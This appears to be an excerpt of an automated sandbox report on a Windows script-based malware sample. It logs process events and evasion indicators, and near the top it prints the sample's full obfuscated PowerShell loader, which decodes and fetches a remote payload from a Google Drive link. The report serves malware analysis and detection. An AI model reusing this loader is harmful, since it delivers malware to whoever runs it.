(ampler 'Or r$Saddg In LX,nook rrBParaaHylil H,r:ejerdOpilE SkoKRedeLUds,aPe.dmChopAAlliTAs liRes,o DisnLears Whin KreUAggrm SparF.rleRecitHapsSdest=Bsse$TegnGYuccaZophRDemaABragnSvent VseeK,onR yste HopTsabu.BiltSOvipp aikl BotISummTFibr(Blue$ we lBaarvMaxcF KvaaPortlSygedEmmee.nfeTSn g)');Opgrelsesdatoer (ampler $trediveaarsfdselsdagene);$Garanteret=$Deklamationsnumrets[0];$Multilobulated=(ampler ' Aut$ istgj hnllikvO hotBSwasa KralCont:Spo i AfbNStanf Mi oOreor Ve mCol,ACompT NomIC,enO PepNCo.rSDolldUnpoeR.sbL BessU.va=Fr sNG dsESkinW Gen- MelOPengBDiviJGrabeTraaC Mu Tgr,v TaarSEtaaYIsolSBallT Da,eSekuMLed .Cel $Datam Be ePr fd AtaD AlpeRingLHi eAVinegTammT MasI SmoG');Opgrelsesdatoer ($Multilobulated);Opgrelsesdatoer (ampler 'T,rs$Vir I KunnSelefUd,to S.erMikrmAfvraMavetFormiFainoK innJydesindedFinaeGob,l oods Slg. BalHH
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Chairlift;function Opgrelsesdatoer($Perdricide){ .($Buenas) ($Perdricide)} function ampler($Envoyjcs){$Demineraliserings=4;do{$Yamshik+=$Envoyjcs[$Demineraliserings];$Demineraliserings+=5;$Tenebrosity=Format-List} until(!$Envoyjcs[$Demineraliserings])$Yamshik}$Meddelagtig=ampler 'Ho enSp jeSepaTOoph..nglW';$Meddelagtig+=ampler ' HereBldgBStudCCrocLIsoci ReaEF ignpseuT';$Marginellidae=ampler 'KravM sunoKampzVariiRacil Mullun aaKrad/';$Libretto=ampler 'Rec.TCerilDjersUnst1Dobb2';$trediveaarsfdselsdagene='Ki l[Sortn CeceS roTSamm.AmblS.emoe Klarsuppvtun IUp,lcSu.fE.awtpLoy o icaI K fNSibeTPar mL upa Tacn Pa asigggFaitE porR Esk]Cape:d fe:BlteSExigeAstrcBlafU Mi rNyanIDisitPaadY Sk PBirerCircoTinftSaldot.evcC.asOabyillabe= Udp$UdviLTortiO thbencar SpeEBlewTRu.dTWillO';$Marginellidae+=ampler 'Noni5 ui.Zaza0P da E.v(BuggWKommi Counomlad Endoaf,twAfsksKore GhetN DomTRa e T ks1Told0Upfu.Orch0 Kai;.mpe ,egeWTi.vi Ko,n fut6 Sta4Rube;Ps.u KvarxCald6Kuki4Skin;Posi GlacrDimnvFrmn:Effe1Ti e3Ext 4zinn. Mod0Pind)Fald osGHan ePushcAntikHydro Dor/ Ago2Cali0Tl.e1Terp0sa k0d if1Uafl0 D s1S gu LyssF Se,i Pirr.apie CorfSh noPeelx Ban/be.e1Tann3Seiz4 Sho. Una0';$Lygteples240=ampler 'KursUBarnsLongE BalrL.ng-SunrAGodkgUnsheO erNOve.T';$Garanteret=ampler 'ProdhTapetRicktPronp SabsUdvi:.ere/Co o/GasldFormr Ur,iC tovHoa e C n. ludgMi tolarvoAcangBrstlUnreeColo. blocWantoGen,mTy n/HernuBr tcKnar?Galoe TvixB trpba toRegnrRacitP la=VinddPlanoAl owSt.knK oklPebeoSheda geadHove&A kai UnbdViru=Envi1 dsdlobjeUTale6 Domo EroBEngarRos MBrd HBariW inET ar9Cha KOutamSpil-FjorjBa lnNaadgSyno8ChecETeatUKertzcapiPParcgFolkDRekrNTowp-Geos8.elvKWindgSev h op 8KalcM';$Lvfaldet=ampler 'mi.d>';$Buenas=ampler ' dgri .arELinjX';$Brugstyveriers='Flippermaskiner';$Bajerflasker='\Foremilks.sig';Opgrelsesdatoer (ampler 'Bulg$DratGGalilUndeOColoBTrilA ComL red:unwrDManciCompv KlaI Ta DStdpe ploRBamsEStan=flok$ CaveS.mtNStanVsub,:Gl caH.kep Vitp Sped OmrAFangtV poAArte+awin$UnjuBBoliaVandjVarmeGeorr S.cF NonlSus a SplSOverK Ca,E DkkR');Opgrelsesdatoer (ampler 'Or r$Saddg In LX,nook rrBParaaHylil H,r:ejerdOpilE SkoKRedeLUds,aPe.dmChopAAlliTAs liRes,o DisnLears Whin KreUAggrm SparF.rleRecitHapsSdest=Bsse$TegnGYuccaZophRDemaABragnSvent VseeK,onR yste HopTsabu.BiltSOvipp aikl BotISummTFibr(Blue$ we lBaarvMaxcF KvaaPortlSygedEmmee.nfeTSn g)');Opgrelsesdatoer (ampler $trediveaarsfdselsdagene);$Garanteret=$Deklamationsnumrets[0];$Multilobulated=(ampler ' Aut$ istgj hnllikvO hotBSwasa KralCont:Spo i AfbNStanf Mi oOreor Ve mCol,ACompT NomIC,enO PepNCo.rSDolldUnpoeR.sbL BessU.va=Fr sNG dsESkinW Gen- MelOPengBDiviJGrabeTraaC Mu Tgr,v TaarSEtaaYIsolSBallT Da,eSekuMLed .Cel $Datam Be ePr fd AtaD AlpeRingLHi eAVinegTammT MasI SmoG');Opgrelsesdatoer ($Multilobulated);Opgrelsesdatoer (ampler 'T,rs$Vir I KunnSelefUd,to S.erMikrmAfvraMavetFormiFainoK innJydesindedFinaeGob,l oods Slg. BalHHJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFCB09100BD pushad ; iretd 4_2_00007FFCB09100C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFCB09E79FE push ds; ret 4_2_00007FFCB09E79FF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_072CCF5C push eax; iretd 14_2_072CCF5D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03865791 push cs; ret 16_2_038657C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03863198 pushfd ; iretd 16_2_0386319B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_038629A7 pushfd ; retf 16_2_038629B2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_038651C2 push cs; ret 16_2_038651D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03861BD1 push ecx; retf 16_2_03861BD2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_038613F6 push ecx; ret 16_2_038613FB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03861B14 push ss; iretd 16_2_03861B20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03863B12 pushfd ; retf 16_2_03863B18
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03860340 push ss; iretd 16_2_03860348
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_038622BC push ss; iretd 16_2_038622C1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03860ABA push edi; iretd 16_2_03860BA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_038658BB push B48DFD26h; iretd 16_2_038658C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_038624D2 push ebp; retf 16_2_038624D3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03861E00 push ss; iretd 16_2_03861E03
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03864613 push 8FA99D57h; iretd 16_2_03864618
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03865639 push cs; retf 16_2_03865658
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03865864 push esi; retf 16_2_03865865
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Initial fileInitial file: Do While Polypoda.Status = 0 WScript.Sleep 100
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5766Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4121Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7136Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2651Jump to behavior
              Source: C:\Windows\System32\wscript.exe TID: 7064Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6704Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 3908Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1236Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 7332Thread sleep count: 38 > 30Jump to behavior
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
